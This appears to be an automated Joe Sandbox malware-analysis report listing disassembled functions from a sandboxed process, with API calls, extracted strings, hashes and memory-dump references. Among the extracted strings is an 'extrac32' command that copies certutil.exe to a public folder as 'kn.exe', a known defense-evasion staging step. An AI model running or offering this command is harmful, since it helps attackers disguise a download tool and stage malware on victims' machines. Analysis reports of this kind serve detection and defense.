                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                      • String ID:
                                                      • API String ID: 734197835-0
                                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                      • Instruction ID: e0b666f8532200cba8630df44af46a6a906c75f3742f1af43b6f440266643159
                                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                      • Instruction Fuzzy Hash: 7861F535D0CA9686E724EB11A80233DFA91FB85745F848237DD8E83794DFBCA544C792
                                                      Function 00007FF7E1DD9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Enum$Openwcsrchr
                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                      • API String ID: 3402383852-1459555574
                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction ID: 53927a568236833ef1e237450670e4c249fac1d954a8a92c2a8f5b739748fb4a
                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction Fuzzy Hash: 72A1C761A0964292EF19EB55D0523B9E2A0FF85B90FC44632DA4F477C4DFBDE941C322
                                                      Function 00007FF7E1DC7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscmp
                                                      • String ID: %s
                                                      • API String ID: 243296809-3043279178
                                                      • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction ID: 2e5331608cf49b331b387461752fd860a29b8f58b3e68a0e05dc695ab059baf2
                                                      • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction Fuzzy Hash: 99A1C022B0978696EF35EF21D8423F9A3A0FB48758F904436DA4E4B694EF7CE644C351
                                                      Function 00007FF7E1DB1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$EnvironmentVariable
                                                      • String ID: DIRCMD
                                                      • API String ID: 1405722092-1465291664
                                                      • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                      • Instruction ID: fd0ecb72b1a001a5b27369fbb0332acee4e32565ba5895a9fb66a6eb90b55d8a
                                                      • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                      • Instruction Fuzzy Hash: 4E813C72A14BC18AEB20DF60A8817ED77A4FB88748F90413ADA8D57B58DF78E145C711
                                                      Function 00007FF7E1DB99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9A39
                                                        • Part of subcall function 00007FF7E1DBDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7E1DBCEAA), ref: 00007FF7E1DBDFB8
                                                        • Part of subcall function 00007FF7E1DBDF60: RtlFreeHeap.NTDLL ref: 00007FF7E1DBDFCC
                                                        • Part of subcall function 00007FF7E1DBDF60: _setjmp.MSVCRT ref: 00007FF7E1DBE03E
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9AF0
                                                      • wcschr.MSVCRT(?,?,?,00007FF7E1DB99DD), ref: 00007FF7E1DB9B0F
                                                        • Part of subcall function 00007FF7E1DB96E8: memset.MSVCRT ref: 00007FF7E1DB97B2
                                                        • Part of subcall function 00007FF7E1DB96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB9880
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DCB844
                                                      • wcscmp.MSVCRT ref: 00007FF7E1DCB86D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                      • String ID: FOR$ IF
                                                      • API String ID: 3663254013-2924197646
                                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                      • Instruction ID: 53620a75291f478ec18f69f454d844b8bd7a45eb622a1d5f97bd24eee4574c3a
                                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                      • Instruction Fuzzy Hash: 1851BF60F0964295EF18FB15945237AAAA1FF48BD0BD84636D91F473D1DEBCE801C362
                                                      Function 00007FF7E1DBF173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1BA
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF1E7
                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1FF
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$iswspacewcschr
                                                      • String ID: )$=,;
                                                      • API String ID: 1959970872-2167043656
                                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                      • Instruction ID: 084bf756ce94381ba742ff9c6fb5dabbb4bfde32822e5050ccaca7eccda9f480
                                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                      • Instruction Fuzzy Hash: E041CE62E08212A1FB64EB14E8567B9B6A0BF11741FC48033C98E422A4DFBCA4918722
                                                      Function 00007FF7E1DDBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                      • String ID: %04X-%04X$:
                                                      • API String ID: 930873262-1938371929
                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction ID: e46f17493ce8f2359f4980bac5d54771cc69800845f5c769ce2c0579dff52851
                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction Fuzzy Hash: AA416421A08A4292EB24EB60E4523BAE360FB85755FC18237E58E426D5DFBCD544C762
                                                      Function 00007FF7E1DC36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 3249344982-2616576482
                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction ID: aa4ed4db75d2f44ac459449a037098802e5269b963e0e4e87f723f36d13b758d
                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction Fuzzy Hash: 9741CF72A18B8196E710DF12A841339FBA0FB89BC5F848636DA4E47794CFBCD014CB51
                                                      Function 00007FF7E1DC6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A73
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A91
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AB0
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AE3
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6B01
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$iswdigit
                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                      • API String ID: 2770779731-632268628
                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction ID: beadcbb0409da8bb26386bf7f19b3b267d8472ced86939c05d6d2d7f036e2e87
                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction Fuzzy Hash: D0313B22A08A5685EB54EF02E491379B7E1FB49F85B85C436DA5E83364EF7CE404C362
                                                      Function 00007FF7E1DDD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                      • String ID:
                                                      • API String ID: 3192234081-0
                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                      • Instruction ID: a9bd58d3695cbfdf2b22360e8d009d52db9749e76fb57b8b10ad3cf04e00928c
                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                      • Instruction Fuzzy Hash: C231B132A08A419BE714EF21A44677DFBA1FB89B91F809235DE4A43791CF7CE4018B11
                                                      Function 00007FF7E1DC1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1673
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC168D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1757
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC176E
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1788
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC179C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Alloc$Size
                                                      • String ID:
                                                      • API String ID: 3586862581-0
                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction ID: 4a002404111aaec6dd31e9545b9aa29a4e0cd3b0f55e56810cc0d3022b8664cd
                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction Fuzzy Hash: 52918D61A09A56D1EF14EB15E842379B6A1FF48B80F998933CA4D033E4DFBCE451C7A1
                                                      Function 00007FF7E1DC86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                      • String ID:
                                                      • API String ID: 1313749407-0
                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction ID: 3d531663272f15aa2a167deb42ed56b0d1ebfc48d506e8435f32f78f1f9ee04f
                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction Fuzzy Hash: 2551C622A0868292FF14FB15A406779E691FF49B90FC94636DD1E077D0EFBCE491C2A1
                                                      Function 00007FF7E1DDEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                      • String ID:
                                                      • API String ID: 920682188-0
                                                      • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                      • Instruction ID: 1348a3fa749fd3a0be6aa7ea4f87ccf2edd04e9b2df64fc8e1d1f79d2aab215f
                                                      • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                      • Instruction Fuzzy Hash: 85517932705B818AEB25EF24D8517E8B7A0FB88B85F84813ACA4E47754EF7CD645C711
                                                      Function 00007FF7E1DBDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7E1DBE00B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess_setjmp
                                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 777023205-3344945345
                                                      • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                      • Instruction ID: f09449c6f26b8922ef461cc58ccc80815173399eabf5d945f0d935406b84da23
                                                      • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                      • Instruction Fuzzy Hash: 2F517970D0DA4295EB14EB11A882779FAA4FF49740FD44437D90E832A9DFBCA560C722
                                                      Function 00007FF7E1DBF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1BA
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF1E7
